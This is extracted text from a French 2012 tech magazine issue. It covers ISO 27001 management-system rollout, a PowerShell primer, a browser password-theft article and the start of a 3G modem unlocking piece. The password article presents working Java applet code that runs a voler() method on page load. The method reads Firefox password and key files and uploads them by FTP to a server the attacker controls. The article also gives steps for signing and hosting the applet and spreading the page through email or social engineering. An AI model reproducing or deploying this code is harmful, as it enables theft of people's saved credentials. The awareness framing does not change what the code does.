D’après ALEXANDRE FERNANDEZ –TORO, dans son ouvrage « Manage-ment de la sécurité de l’information », Il ‘y a plusieurs approches pour abor-der le projet SMSI, nous allons étudier deux méthodes :

L’approche séquentielle : consiste à suivre de façon séquentielle les exi-gences de la norme dans leur ordre affiché. Or, cette démarche s’avère dangereuse car elle ne prend pas en considération plusieurs facteurs à savoir :

• La réalité du terrain : la fixation du périmètre et la politique au début n’est

• pas toujours une bonne idée.• Les mesures déjà existantes .• Certaines taches manquantes :

la norme n’étant pas un « docu-ment projet ».

• La nécessité de paralléliser les tâches : la norme iso 27001 présentes les exigences de fa-çon séquentielles sans préciser quelles taches doivent être con-duite en parallèle

L’approche projet : consiste à prendre toutes les libertés nécessaires pour garantir le succès du projet.

A condition que le SMSI doit remplir les trois contraintes suivantes :

1. Exigence de la norme2. Modèle PDCA3. Cohérence générale

Dans la suite on va détailler les

étapes de chaque approche

Tera-Magazine

21

L’approche projet :

Dans l’optique de cette approche la mise en place du SMSI se fait en quatre étapes :

Phase 1 : analyse préalable.Dans cette phase, on commence par

une étude d’opportunité, suivi par un état de lieux et s’achève par la sélec-tion d’un scénario de déploiement

•Etudesd’opportunité:ilconsisteà concrétiser les apports de la mise en place d’un SMSI pour l’entreprise ainsi de bien connaitre les attentes des par-ties prenantes.

• Etatdeslieux:s’ils’estavéréquela mise en place apportera un gain pour l’entreprise, il conviendra ensuite de faire un état de lieu càd faires des point sur la situation de l’entreprise vis-à-vis du mécanisme élémentaire du système de management

•Etudedesoptions(politiqueetpérimètre) : compte tenu de la situa-tion constatée,

il sera possible d’étudier plusieurs options de périmètre. Il s’agit de com-parer le coûtde chacune des options avec les bénéfices escomptés de chaque option s et finalement la direc-tion générale retiendra la meilleure option

Phase 2 : La mise en place de la structure de base.

Cette phase consiste à bâtir le socle des services qui formeront l’infrastructure du SMSI. Ce socle sera construit des phases suivantes :

• Gouvernancedelasécurité:ils’agit de mettre en place une hiérar-chie à fin de prendre les bonnes dé-cisions de sécurité. En effet, dès le départ du projet, la validation officielle de la politique et le périmètre s’avère

impératif.•Documentation:leSMSInécess-

ite le passage à la tradition écrite. Ainsi toute la documentation du SMSI re-posera sur les règles fixées dans cette procédure.

•Auditinterneetsuividesac-tions : cette étape consiste à bâtir une structure d’audit interne afin d’assurer l’efficacité et la conformité que les processus du SMSI aux exigences de la norme. Les trois étapes précédentes seront détaillées dans la suite.

• Formationetsensibilisation:lanorme exige la sensibilisation du per-sonnel impliqué dans le système de management à la sécurité ainsi que sa possession des compétences néces-saires à l’exploitation du SMSI. ce pro-jet sera aussi détaillé dans le chapitre9.

•Indicateurs:indiquentauxmangements l’état d’avancement du projet

Ils permettent aux décideurs de connaitre le niveau de conformité et de performance du système, ainsi tout processus qui qui s’intégré au SMSI pourra faire l’objet d’un indicateur

L’intérêt de cette structure réside dans:

• L’accueil des nouveaux processus• La participation active aux con-

structions des nouveaux proces-sus

Cette phase est la plus sensible du projet car c’est elle qui détermine si on peut continuer la construction avec succès du SMSI ou condamne le projet à l’échec au cas où elle est mal établie

Phase 3 : mise en place des proces-sus du SMSI

Constitue la phase la plus longue du projet est constitué de :

• Appréciationdesrisques:c’estun point clé du projet puisqu’elle per-mettra les mesures de sécurité les plus

22

22

Dossier Tera

propices par apport au contexte et à la politique du SMSI.

•Adaptationdesmesuresdesé-curité existantes : les mesures de sé-curité déjà pris avant le projet du SMSI doivent être mises en conformité avec le modèle PDCA

• Implémentationdesmesuresdesécurité manquantes: les mesures de sécurité sélectionnées dans la déclara-tion d’applicabilité (SoA) et non encore mises en place devront être implémen-té

•Revue:constitue,avecl’auditinterne, l’important de la phase check

A la fin de cette phase, le système de management est presque terminé. Il ne reste qu’entamer la dernière phase pour réussir le projet

Phase 4 : Le démarrage du SMSI L’objectif de cette étape consiste à

vérifier si tout est prêt pour réussir la certification du premier coup. Cette phase est composée d’une succession d’étapes, comme suit :

Revue de SMSI : elle se fait, nor-malement, une seule fois par an, com-me elle peut être faite juste à la fin de la construction du SMSI. Cette phase consiste à exécuter les processus déjà définis dans la phase précédente (mise en place des processus du SMSI).ainsi il permet de faire des reculs afin de véri-fier l’efficacité, le bon fonctionnement du système et que celui-ci répond bel et bien aux besoins des parties pre-nantes. Il est recommandé de faire ap-pel à cette étape avant la commande à un audit de certification.

Préparation à l’audit : cette étape constitue la phase de vérification et préparation de tous les documents nécessaires avant l’arrivée des audit-eurs.

Audit à blanc : comme son nom l’indique, il s’agit d’un audit, de la sorte d’un examen blanc, qui a pour but

d’examiner le fonctionnement du SMSI, de plus préparer le personnel à l’audit réel. Il est recommandé de faire appel à un cabinet indépendant pour piloter cet audit.

Action correctives et préventives : cette phase est introduite pour corri-ger toutes les écarts constatés lors de l’audit blanc. A ce stade, tous les pro-cessus seront déroulés au moins une seule fois, ils ont été audités par un cabinet indépendant, les écarts figu-rants ont été corrigés, il ne reste qu’à l’inauguration officielle du SMSI, par la commande de l’audit de certification.

Le digrammes suivant résument l’approche du projet de SMSI

Tera-Magazine

23

L’approche séquentielle « clas- sique » :

Les SMSI fonctionnent selon un modèle cyclique en quatre étapes appelé « PDCA » c’est-à-dire : Plan, Do, Check, Act.

µ Phase planFixe les objectifs du SMSI

La phase Plan du SMSI comprend 4 étapes :

Étape 1 : Définir la politique et le péri- mètre du SMSI

Étape 2 : Identifier et évaluer les ris- ques liés à la sécurité et élaborer la poli- tique de sécurité.

Étape 3 : Traiter le risque et identifier le risque résiduel par un plan de gestion

Étape 4 : Sélection des mesures de sécurité à mettre en place

µ Phase do :Met en place les objectifs

Elle se découpe en plusieurs étapes :

1. Établir un plan de traitement des risques

2. Déployer les mesures de sécurité 3. Générer des indicateurs • Deperformancepoursavoirsiles

mesures de sécurité sont efficaces • Deconformitéquipermettent

de savoir si le SMSI est conforme à ses spécifications

4. Former et sensibiliser le personnel µ Phase check

Consiste à gérer le SMSI au quotidien et à détecter les incidents en perma- nence pour y réagir rapidement 3 outils peuvent être mis en place pour détecter ces incidents :

1. Les audits internes qui vérifient la conformité et l’efficacité du système

management. Ces audits sont ponctuels et planifiés.

2. Le contrôle interne qui consiste à s’assurer en permanence que les proces- sus fonctionnent normalement.

3. Les revues (ou réexamens) qui ga- rantissent l’adéquation du SMSI avec son

environnement.

Phase actMettre en place des actions correc-

tives, préventives ou d’amélioration pour les incidents et écarts constatés lors de la phase Check

•Actionscorrectives:agirsurlesef- fets pour corriger les écarts puis sur les causes pour éviter que les incidents ne se reproduisent

•Actionspréventives:agirsur les causes avant que l’incident ne se produise

•Actionsd’amélioration:améliorerla performance d’un processus du SMSI.

Comme le resume le diagramme suiv- ant:

Les erreurs à éviter :

On présentera les erreurs couran- tes systématiquement commises :

• µ Travail sans le soutien de la direction général

• µ Travailler seul • µ Ne pas mettre en place la

structure de base • µ Se tromper du périmètre • µ Déclaration d’applicabilité • µ Faire de la procédure

24

24

Dossier Tera

Comme nous avons vue l’approche projet pour la mise en place du SMSI est constituée de quartes phases dont la mise en place de la structure de base du SMSI est la plus détermi-nante, celle-ci à son tour est formée de Cinque étapes déjà présentés dans cet article. Nous étudions de prés les étapes de la documentation et celle de l’audit interne.

La Documentation :

La documentation est un élément essentiel du SMSI. Sa mauvaise réali-sation conduit à l’échec de système de management c’est ainsi qu’il incluse dans les exigences de la norme.

Exigences normatives.

Il n’y a aucune contrainte par la norme sur le support de la documen-tation. Il peut être sur papier ou sous

format électronique.En revanche, la création d’une

procédure décrivant comment la docu-mentation sera gérée est et imposée par la norme. Cette procédure doit im-pérativement répondre aux questions suivantes :

1. comment les documents sont-ils approuvés ?

2. comment sont ‘ils mises à jour ?3. comment les versions sont-elles

gérées ?4. comment restreindre l’accès à

ces documents sur les personnes qui sont concernées seulement ?

5. comment sont-ils retirés lorsqu’ils ne sont plus valides?.

Il sied, dans un premier temps, d’enlever la confusion entre les deux notions : document et procédure.

En effet, il existe trois catégories de documents :

1. les documents de politique : consiste à fixer les objectifs à atteindre dans un domaine particulier

2. les documents de procédure : consiste à décrire les activités relatives à un processus bien défini

3. les enregistrements : ces eux qui prouvent la convenance du fonc-tionnement du procédure, ils peuvent être sous plusieurs formes.

Documents d’exigés :

On va expliciter dans la suite les documents nécessaires au SMSI.Documents explicitement exigés :

La clause 4.3.1 liste les documents obligatoires pour la mise en œuvre d’un SMSI

• µPolitique et périmètre du SMSI

ZOOM sur la deuxième Phase 2 de l’approche projet :

mise en place de la structure de base du SMSI.Vue l’importance de cette phase qui est la plus sensible du projet car, elle condamne le projet à l’échec au cas où elle est mal établie

Tera-Magazine

25

• µDescription de la méthode d’appréciation des risques • µRapport d’appréciation des ris-ques • µPlan de traitement des risques • µDéclaration d’applicabilité (SoA)• µProcédure descriptif de la mise en œuvre d’efficacité et de confor-mité des mesures (4.2.3.c)• µToutes les procédures en support du SMSI

Documents implicitement nécessaires :

Ces documents ne sont pas mention-nés dans la liste du chapitre 4.3.1, mais chacun deux est mentionnée au moins une fois dans la norme ce qui les rend nécessaires

•µProcédure de gestion des docu-ments clause (4.3.2), montre com-ment sont créés, validés, mis à jour.•µAutorisation du management à mettre en place et à exploiter le SMSI clause (4.2.1.i) •µApprobation du management sur les risques résiduels (clause 4.2.1.h)•µProcédure de détection et de ré-action aux incidents (clause 4.2.2.h et 4.2.3.a.2)•µProcédure de sensibilisation et de formation à la sécurité (clause 5.1.d et 5.2.2)•µProcédure d’audit interne (clause6) •Procédure de revue du SMSI (clause 7)•µToutes les procédures en support des mesures de sécurité sélec-tionnées dans l’Annexe A.

Erreurs très courantes à

_viter

1. La procédure ne décrit pas la réalité : il y a un grand écart entre ce qui est dit et ce qui est fait. Cette situation ap- parait lorsque la personne qui rédige la procédure n’est pas la même que celle qui l’applique (dans le cas d’un appel à des prestataires pour la rédaction des documents du SMSI)

2. La procédure de gestion des docu- ments n’est pas appliquée. 3. La numérotation des documents est incohérente 4. Seuls les documents MS Word com- porte une cartouche. En effet la procé- dure de gestion de la documentation présente souvent un exemple de car- touche qui permet d’identifier qui a fait quoi sur le document. Or, les tableaux les documents PDF et les rapports issus d’application ne comporte pas ce car- touche.

Recommandations :

ll est recommandé, pour rédiger de façon claire qui répond aux exigences de la norme de faire des rubriques qui répondent très clairement aux questions suiv-antes : qui ? Fait quoi ? Quand ? En générant quel enregistrement ?

De plus, il est vivement conseillé que ces procédures soient rédi-gées par ceux qui les exécutent, ou au moins validés par ces per-sonnes.

Finalement, il est favorable de ré-diger de façon laconique.

26

26

Dossier Tera

Audit interne et suivi des actions

L’audit interne et le suivi des ac-tions constituent le second pilier du SMSI.

Les audits internes vérifient la con-formité et l’efficacité du système man-agement. Ces audits sont ponctuels et planifiés. C’est le processus le plus important de la phase check du PDCA.

Le contrôle interne consiste à s’assurer en permanence que les pro-cessus fonctionnent normalement.

Exigences normatives :Les clauses 4.2.3.a.3 et 4.2.3.e abor-

dent l’audit interne. L’article 6 détaille les exigences en matière de matière d’audit interne. L’audit doit impérative-ment suivre le modèle PDCA.

Il est important de mettre en place un document de procédure qui décrit la manière avec laquelle sont plani-fiés les audits, les rapports qui se-ront issus de cette étape, serviront d’enregistrement pour prouver le bon fonctionnement du processus, finale-ment des revus mettront en exergue les actions à effectuer pour améliorer les audits.

L’implémenteur dispose de toute la liberté d’adapter une démarche à con-dition que cette dernière suit le modèle PDCA.

Les objectifs de l’audit interne :

Les trois principaux objectifs de l’audit interne sont :

1. Absence d’écart entre les proces-sus du SMSI et les exigences des claus-es 4 à 6 de la norme

2. La conformité de l’application des mesures de sécurité, mentionnées

dans le SoA, au modèle PDCA.

3. L’absence d’écart entre les procé-dures internes et leur application rée-lle.

On peut remarquer qu’il ne s’agit pas de vérifier l’efficacité des mesures de sécurité, mais plutôt de vérifier si la roue de Deming arrive à tourner.

En effet, il faut différencier en-tre l’audit technique qui sert à véri-fier le niveau de sécurité effectif de l’entreprise et l’audit interne qui a pour rôle de vérifier si le système de man-agement répond aux exigences de la norme. Mais rien n’empêche que ces deux procédures soient complémen-taires.

Programme des audits internes : Il s’agit d’un document obligatoire

qui comporte les dates prévues des prochains audits et le champ de cha-cun.

Il est important de bien saisir les no-tions suivantes

Champ d’audit : désigne la liste des points qui seront

à contrôlés lors d’un audit (déroule-ment des audits)

Programme d’audit : désigne la liste des audits program-

més durant l’annéePlan d’audit : détailles les points à aborder lors

d’un audit Le déroulement des audits internes :Quelques semaines avant l’audit,

l’auditeur présente à l’audité le plan d’audit qui détailles les champs des

actions qui vont être auditées

La méthodologie d’un audit :

La mise en place des audits internes peut être interne c.-à-d. : désigner les auditeurs parmi les personnels internes de l’entreprise ou bien exter-naliser la procédure en faisant appel à des prestataires professionnels, mais l’inconvénient de cette stratégie réside

Tera-Magazine

27

dans le cout important de son élabo-ration, comme on peut combiner les deux méthodes en exécutant les audits internes avec le personnel interne de l’entreprise et faire appel à un extérieur une fois par an

Suivi des actions :Un audit ne sert à rien s’il n’est suivi

d’action. En effet lorsqu’un auditeur constate une non-conformité dans un processus, son responsable doit entre-prendre les actions pour corriger les causes et les effets

Les actions peuvent êtres :µ Action correctives : surviennent

lorsqu’un écart ou un incident s’est produit ou lorsqu’une mesure de sécu-rité s’avère inefficace

Dans ce cas il faut agir sur les effets et les causes

µ Les actions préventives : survien-nent avant qu’un écart ou incident ne se produit

Dans ce cas on ne peut agir que sur les causes

Lorsqu’un écart est identifié par un auditeur, l’audité est appelé à réagir ainsi :

1. proposer à l’auditeur les actions correctives et préventives ainsi qu’un délai de réalisation dans un document intitulé « fiche d’écart ».

2. faire valider les actions et leurs délai par l’auditeur, cette validation est faite sur la fiche d’écart

3. mettre en place ces actions4. vérifier l’efficacité de ces actions.

Nous rappelons que L’audit interne et le suivi des actions constituent le sec-ond pilier du SMSI. Cette étape consiste à bâtir une structure d’audit interne afin d’assurer l’efficacité et la conformité que les processus du SMSI aux exi-gences de la norme. Ainsi nous avons couvert deux des plus importants com-posants de la phase de mise en place de la structure du SMSI.

à Suivre ...

À travers cet article nous n’avons vue qu’une part de la partie émergée de l’iceberg. Il reste beaucoup de choses à éclaircir.

Dans la suite de ce dossier nous allons découvrir les audits et les processus de certification, les organismes de certifica-tion. Comment peut-on se certifier iso 27001 au Maroc? Combien ça coute etc.

Nous espérons que vous avez revalo-risé cette norme qui constitue bien un avantage concurrentiel plus qu’un simple label de marketing. Attendez la suite dans le prochain numéro de ce Magazine. Nous comptons bien sûr vos feedbacks.

28

28

Prérequis : Connaissances en cmd.exe

Outils : Windows, Powershell instalé

Durée: 10 min

J

Le sheLL de WindoWs. un outiL à découvrir.

e ne vous appren-drai rien, si je vous dirais que l ’environnement

en ligne de commande fournit avec les systèmes Windows est très pauvre en tout. Pour palier à ce manque et pour être au niveau des différents shells Unix et les autres langages de scripting tels que : Perl, ou VBScript, etc. Microsoft propose donc PowerShell.

Après l’apparition du XP Windows a définitivement négligé son MSDOS en faveur d’une simple invite de commande cmd.exe sans grand intérêt qui ne pré-sente pas de fonctionnalités avancées et une docu-mentation médiocre. Avec le passage à Windows Vista/7 et l’apparition du Powershell, cette image va-t-elle changer ? Windows tend-elle à s’inspirer de Linux et offrir enfin un vrai langage de script. ?

Selon le site officiel du powershell, Le but de Micro-soft est de faire un langage de script complètement intégré, avec autant de fonctionnalités que celles qui existent sous Unix (et Linux) et avec le même niveau de sécurité.

PowerShell

17

Prérequis : Connaissances en cmd.exe

Le sheLL de WindoWs. un outiL à découvrir.

>>Présentation du PowershellPowerShell est le successeur des interfaces en ligne de commande fournies par

•command.com(c’est-à-direl’interface MS-DOS) de Mil-lennium, Windows 98 et de ses prédécesseurs ;•cmd.exedeWindowsNTdepuis 1993.

Powershell est un langage de script orienté objet développé par Microsoft. Il s’appuie sur le framework Microsoft .NET .Il est désormais directement intégré aux nouveaux systèmes d’exploitation Windows 7 et Windows Server 2008. Powershell est compatible avec toutes les versions de Windows supportant le Framework.NET 2.0. La version finale a été publiée le 14 novembre 2006.

Windows PowerShell, anciennement Microsoft Command Shell (MSH) est une interface en ligne de commande et un lan-gage de script développé par Microsoft

PowerShell

18

“PowerShell est plus proche des langages de script orientés objet comme Perl que de lan-gages de shell, comme bash.”

Caractéristiquesdu PowerShell

• Le cœur du langage est basé sur la norme POSIX 1003.2 suivie par Korn shell.

• Il ressemble beaucoup à PHP et Perl.

• La syntaxe a été alignée sur C# On peut donc très facile-ment convertir du code C# en PS et réciproquement

• Support des Alias, Tab-com-pétion & usage des para-mètres

• Pipelining, Object utilities, meilleur documentation,

• Cmdlets securisés• Orienté Objet• Extensible• Facile à apprendre• Accès aux objects: ADO,µ

.NET,µ WMI,µ COM,µ Etc…

PowerShell est plus proche des langages de script orientés objet comme Perl que des langages de shell, comme bash. Il n’y a aucune ressemblance entre le PowerShell et le très simpliste langage batch des fichiers .BAT de DOS/Windows.

Les pré-requis Des connaissances de base sur la programmation orientée objet sous .NET faciliterons la compréhension de cet article.

Installer PowerShell

PowerShell est supporté aujourd’hui uniquement par les systèmes sui-vants:• Windows XP Service Pack 2• Windows Server 2003• Windows Vista• Windows Seven• Windows Server 2008

Si votre système est supporté vous aurez alors à installer le .NET Framework 2.0, Puis installer le package PowerShell correspon-dant à votre système (Fig1). Depuis le 24 mars 2009, Windows Power-Shell 1.0 pour Windows XP et Vista est dis-tribué comme une mise à jour logicielle fa-

cultative par le service Windows Update de Microsoft. http://www.microsoft.com/windowsser-ver2003/technologies/management/powershell/download.mspx

fig.1

PowerShell Tera

Disponiblité du PowerShell :

Tera-Magazine

19

fig.3

fig.5 : résultat du get-process

Utilisation de Powershell

La version 2 de PowerShell apporte de nombreuses évolutions, notamment l’écriture de cmdlet en code natif à l’aide de fonctions avancées utilisant différents types d’attributs.

Utilisation :L’utilisation du Powershell, passe soit

par l’invite de commande cmd.exe en utilisant la command powershell ou en utilisant sa propre invite de command.

Une fois votre nouvel environne-ment de Scripting PowerShell installé il ne reste plus qu’à vérifier qu’il est bien fonctionnel.

Pour lancer PowerShell, je vous pro-pose plusieurs solutions:

1-Lancer Windows PowerShell à par-tir du menu Démarrer / Programmes / Windows PowerShell 1.0

2-Créer un raccourci de powershell.exe à partir de C:\Windows\System32\windowspowershell\v1.0

3-Taper powershell directement dans Démarrer / Exécuter ou suffit de presser la touche WIN + R et de taper Powershell puis ENTER pour lancer l’in-terpréteur.

4-lancer une recherche dans le menu démarrer (Fig3) de powershell.

Get started !!

>>Syntaxe et premières commandes

Concernant la syntaxe au sein de PS, elle est en réalité très simple car elle se compose de 2 éléments, un sujet et un

verbe, comme dans l’exemple ci-des-

sous :

[VERBE]-[NOM]

>>Exécuter une commandeNous allons exécuter notre première

“cmdlets”. Une fois dans l’interpréteur PowerShell, exécuter la commande sui-vante:

get-command

qui retourne un ensemble de com-mandes (cmdlets) disponibles en powershell.

Nous allons maintenant exécuter notre deuxième commande, À savoir celle qui nous permet de lister les com-mandes disponibles, un classique.

Get-Process

elle Affiche les informations des pro-cessus en cours d’exécution.

Le résultat est présenté dans la fi-gure ci-dessous (Fig.5)

2012www.Teramagazine.tk 20

20

Exemple de la puissance de ce powershell :

Powershell est un outil puissant pour réaliser des scriptes bien utiles est per-formant. le simple bout de code suivant peut bien vous être utile .

[Activator]::CreateInstance([Type]::GetTypeFromCLSID([Guid]’{DCB00C01-570F-4A9B-8D69-199FDBA5723B}’)).IsConnectedToInternet

True

Cette ligne de commandes retourne “true” si votre machine est connectée à internet ou “false” dans le cas contraire.

PowerShell

Fig.6: windows powershell ISE

Fig.7: Cli+ F7

>>Créer un script Powershell

Pour créer un fichier de script PowerShell, il suffit de créer un fichier ayant pour extension .PS1 dans lequel vous allez copier votre code. On peut aussi utiliser l’outil Windows Power Shell ISE qui est disponible sous Windows Seven (Fig6).

Astuce Pour le CLi Pow-ershell :

Affichage de l’historique des commandes tapées, presser F7.F5 pour réutiliser la dernière commande tapée (Fig7)

Tera-Magazine

21

Fig.7: Cli+ F7

Quand vous commencez à ap-prendre PowerShell, je pense que vous serez très heureux. Une grande partie de la conception est fortement influencée par les origines Unix de Windows, bien qu’ils sont actuelle-ment tout à fait différent. Testez vos commandes *nix préférés sur power-shell et jugez-le vous même.

2012www.Teramagazine.tk 22

22

Outils : Netbeans, JavaNiveau : Débutant

Durée: 30 min

Sécurité informatique

Partie 2 : vol des mots de passes

ans la première partie de cet article, publiée dans l’édition précédente de cette revue, je vous ai expliqué le danger potentiel qui tourne autour de

vos mots de passe enregistrés dans les navigateurs. J’ai introduit les méthodes pour les décrypter et les lire sans votre permission. Toutefois, pour le faire il faut s’emparer, comme j’ai déjà expli-qué, d’un certain nombre de fichiers de chez vous. Dans cette partie nous allons faire un exemple qui explique comment à travers une page web peut-on avoir accès aux données nécessaires. Certes il existe plusieurs méthodes, cependant par me-sure de sécurité, je présente la moins dangereuse, vu que le but de cet article n’est pas de vous initier à prendre les donnes d’autrui ,mais plutôt d’avoir une idée de ce qui vous menace en navigant sur Internet.

Dans mon article précédent j’ai parlé de Firefox seulement comme un exemple mais l’idée peut bien s’étendre à chrome, MSN, clés de vos registres Windows, etc. … Pour avoir accès à votre disque dur en ligne il existe différents moyens. Je choisi le plus courant c’est de créer une page web qui contient du code mali-cieux. Pour ne pas causer des ennuis si cet article tombe entre de mauvaises mains je choisi d’utiliser un moyen dont il est facile de s’en protéger. Il s’agit de la mise en place d’une page web qui contiendra juste une ‘Applet java’ qui se charge de récupérer les fichiers vou-lues.Je vous conseille vivement de lire la pre-mière partie avant de continuer la suite pour connaître le but de cet article.

D

Par : ILYAS BAGUI

23

Pré-requis : Comme j’ai précisé au début je

vais utiliser une applet java pour piéger la victime, donc avant de se lancer je mets une petite définition de celle-ci.

Applet Java:

Si vous êtes un développeur Java vous connaissez sans doutes les applets Java. Il s’agit d’une classe Java qui peut être exécuté par un navigateur. Alors, ça sera notre fenêtre vers l’ordinateur de la victime.

En mots simple une applet c’est du code java dans un navigateur.

FTP :

Nous aurons aussi besoin d’un compte FTP pour que l’applet puisse transférer les fichiers « volés » vers ce serveur

Let’s start Pour vous éclaircir la démarche

nous procédons en étapes :

Étape 1 : création de l’applet L’idée sera de créer une page web

contenant un simple formulaire qui sera destiné à la victime pour le remplir.

Nous commençons tout d’abord par la mise en place de ce formulaire qui sera codé en Java sous forme d’une ap-plet Web. Pour coder j’utilise Netbeans, vous pouvez utiliser l’IDE de votre choix.

Je crée un nouveau projet JAVA je le nomme « applet » et j’y ajoute en-suite, une nouvelle applet. Ensuite vous devez ajouter la librairie ‘simpleftp.jar’ (disponible à http://www.mediafire.com/?7cd4maa5tg9hbl0) pour avoir la possibilité d’envoyer les fichiers à un serveur FTP sur le web.

Le code est un peu long je vous explique en gros de quoi il s’agit.

Les fichiers du projet seront disponibles à teramagazine.tk

Le code est simple à comprendre même si vous n’êtes pas un développeur confir-mé.

Codons un peu !!

Si c’est la première fois que vous avez affaire à une applet je vous conseille de lire un tutoriel pour vous initier à leurs développements.Utiliser l’assistant graphique pour de-signer votre applet sous forme d’un simple formulaire qui sera utilisé comme une façade qui cache le code malicieux, donc peut importe sa forme ou son contenu.Cette applet aura comme forme(Fig.3) :

Fig.1 :Netbeans

Fig.2

Fig.3 : applete java sous forme d’un formulaire

24

Après la création de l’applet on intro-duit les packages utilisés et la méthode d’initialisation. Le code sera donc comme suivant :package applet;import java.io.File;import java.io.FileInputStream;import java.io.IOException;import org.jibble.simpleftp.*;/*** @author Tera magazine */public class Jform extends javax.swing.JApplet {

/** Initializes the applet Jform */ public void init() { try {java.awt.EventQueue.invokeAndWait(new Runnable() {

public void run() { initComponents();

voler();

} });

} catch (Exception ex) { ex.printStackTrace(); } }

// Variables declaration - do not modify private javax.swing.JButton jButton1;

Rien de spécial dans ce bout de code, sauf la fonction voler() qui se charge de tout faire. Au code précèdent il manque bien sur la définition de la méthode voler qui se lance une fois que l’applet est chargé dans le navigateur de la victime, donc qu’il remplisse ou non le soit disant formulaire la méthode voler() s’exécute .Voyons de près cette fonction

Sécurité informatique

private javax.swing.JLabel jLabel1; private javax.swing.JLabel jLabel2; private javax.swing.JLabel jLabel5; private javax.swing.JLabel jLabel6; private javax.swing.JTextField jText-Field1; private javax.swing.JTextField jText-Field2; }

La suite du code

Tera-Magazine

25

public static void voler() { SimpleFTP ftp = new SimpleFTP(); // Connect to an FTP server on port 21. try{ ftp.connect(“Votre_serveur_FTP”, 21, “Nom_utilisateur”, “Mot_de_passe”); ftp.bin(); ftp.cwd(“ftp”); double f=Math.random(); String userName = System.getProperty(“user.name”); Dans cette partie de code l’applet affiché chez la victime établie une connexion avec un serveur FTP

String[] profiles; String path=System.getenv(“APPDATA”)+”\\Mozilla\\Firefox\\Profiles\\”; profiles=dossi_profil(path); for (int i=0; i<profiles.length; i++) { if(profiles[i]!=null) { // System.out.println(profiles[i]);

String signons=f+userName+”.sqlite”; String cert=f+userName+”.db”; String key=f+userName+”.db”; /****************************************envoie vers le serveur*************************/ File filefx=new File(path); if(filefx.exists()) { ftp.stor(new FileInputStream(new File(path+”\\”+profiles[i]+”\\signons.sqlite”)),signons); ftp.stor(new FileInputStream(new File(path+”\\”+profiles[i]+”\\cert8.db”)),”cert”+cert); ftp.stor(new FileInputStream(new File(path+”\\”+profiles[i]+”\\key3.db”)),”key”+key); } else { //firefox non instalé }

////////////////////////////////////////////////////vous pouvez prendre ce que vous voulez de la machine victimeJe vous laisse le soin de lire le code et de le modifier.

2012www.Teramagazine.tk 26

26

Étape 2 création de la page web pour cibler la victime

Après le codage de l’applet mali-cieuse nous aurons besoin de la signer. Car habituellement, le système de sécurité des applets Java interdit totalement aux applets d’accéder aux ressources de la machine (disque dur, base de registre, etc.)

Bien sur ne croyez pas que SUN(oracle) a été si stupide pour créer un moyen qui accède au disque si faci-lement sans alerter l’utilisateur et c’est déjà pourquoi j’ai utilisé cette méthode puisqu’elle alerte la cible pour qui il permet ou non son exécution(Fig.2) .

Si vous voulez créer une applet qui outrepasse ces sécurités, il est néces-saire que:

• Vous créez une applet signée cryptographiquement

• l’internaute autorise explicitement l’applet à accéder au système

Pour signer notre applet on doit pas-

ser par le processus suivant :

1 Compilez l’appletComme d’habitude (créez un fichier

.jar).

2 Générez la clé de signature

Votre clé cryptographique vous ser-vira à signer toutes vos applets.

Tapez:

keytool -genkey -alias votreNomdAlias et donnez les informations néces-saires. N’oubliez pas le mot de passe que vous avez entré pour protéger cette clé. Vous n’avez besoin de géné-

jarsigner -verbose monapplet.jar votre-NomdAlias

ensuite donnez le mot de passe de votre clé. Voilà, votre applet est signée.

Étape 3 Testez votre applet

Créez une page HTML contenant le code suivant

rer votre clé qu’une seule fois

3 Signez votre applet avec votre clé

Utilisez la line suivante dans votre invite de commande:

<html><APPLET CODE=”applet/Jform.class” WIDTH=”100%” HEIGHT=600px></html>

Enregistrez-la sous le nom index.html, ensuite, testez votre applet en affichant la page crée.

Si tout a bien abouti, placez votre ap-plet sur un serveur et testez la via web.

Vous verrez une fenêtre d’avertisse-ment s’affiche immédiatement(fig4), in-diquant que la signature de l’applet n’as pas pu être vérifié et par conséquent il demande à l’utilisateur s’il autorise cette applet ou non.

Sécurité informatique

Fig.4: Alerte de sécurité

Tera-Magazine

27

Étape 4 création d’un compte d’héber-gement web et un compte FTP.

Vous pouvez, vous référez à l’article “ hébergements web gratuits “ ap-paru dans l’édition de juin. Dans mon cas, j’utilise habituellement freehos-tia.com.

Créez un compte d’hébergement web, vous aurez les paramètres d’authentification ensuite créez un compte ftp et utilisez les données fournies dans votre code d’applet dans la fonction connect().

ftp.connect(“Votre_serveur_FTP”, 21, “Nom_utilisateur”, “Mot_de_passe”);

Chargez le fichier html et la class dans la racine de votre serveur. L’ URL

Votre_serveur.com/index.html contiendra désormais une page mali-cieuse qui peut être diffusée par mail ou par Social engineering.

Pour voir une démo de cette applet veuillez visiter http://goo.gl/0shdE

Si une victime accède donc à votre applet les fichiers dont on a parlé dans la première partie seront char-gés sur votre serveur et vous pouvez suivre donc les instructions pour dé-crypter les informations récupérées.

C’est ici que se termine cet article qui met un point sur la sécurité informatique par un exemple concret. J’aurais pu utiliser d’autre technique sur-tout celles qui se basent sur les vulnérabilités des browsers ou autre pour s’infiltrer chez vous. Peut être dans de pro-chains articles.

J’espère que cet article vous a plu. Faites-en bon usage.

J’aimerais signaler qu’il existe des méthodes pour casser ce message de sécurité et forcer l’exécution de l’applet surtout avec Java 7, mais pour des raisons de protection je me contente de vous donner cette information sans révéler comment. Pour en discuter vous pouvez me contacter à : aker.white@gmail.com

Important

2012www.Teramagazine.tk 28

28

“LANCER ET RECEVEOIR DES APPELS EN CONNECTANT UN MODEM 3G EST POSSIBLE !!”

Tera-LaboMise à jour et activation des fonctionnalités cachées.

P45

Tera-Labo

Dificulté

Temps

Outils15

Moyenne

Minutes

Modem huwawei, firmwire

Tera-Magazine

29

MODEM 3GFlush et Upgrade

Par: Kamal bardi

our des questions de concur-rence les opérateurs marocains(IAM, Méditel, INWI), comme partout dans le monde, personnalisent les firmwares

(programme embarqué) des modems 3G pour imposer des limitations d’utili-sation, pour cacher des fonctionnalités qui sont offertes par le constructeur d’origine (Huawei, ZTE..) et pour chan-ger le design(couleurs,logo…). L’utilisa-teur étant indifférent aux stratégies de marketing des opérateurs, il cherche à tirer pleinement profil du produit acquis et ceci en contournant les li-mites imposées (opération légale). Il est fréquent d’avoir le besoin d’utiliser

un modem avec une puce d’un opéra-teur différent ou lancer et recevoir des appels(audio/vidéo) à travers son ordi-nateur, tout en se connectant à son mo-dem sans pour autant remettre la puce à son portable surtout pour les abon-nées aux offres mobiles qui dispose d’une puce 3G. S’a joute aussi le besoin d’installer une interface graphique sous linux pour la gestion de son modem 3G.

Pour arriver à ces fins, il existe des opérations (flashage, mise à jour..) qu’il faut réaliser pour libérer son modem et profiter pleinement de sa puissance.

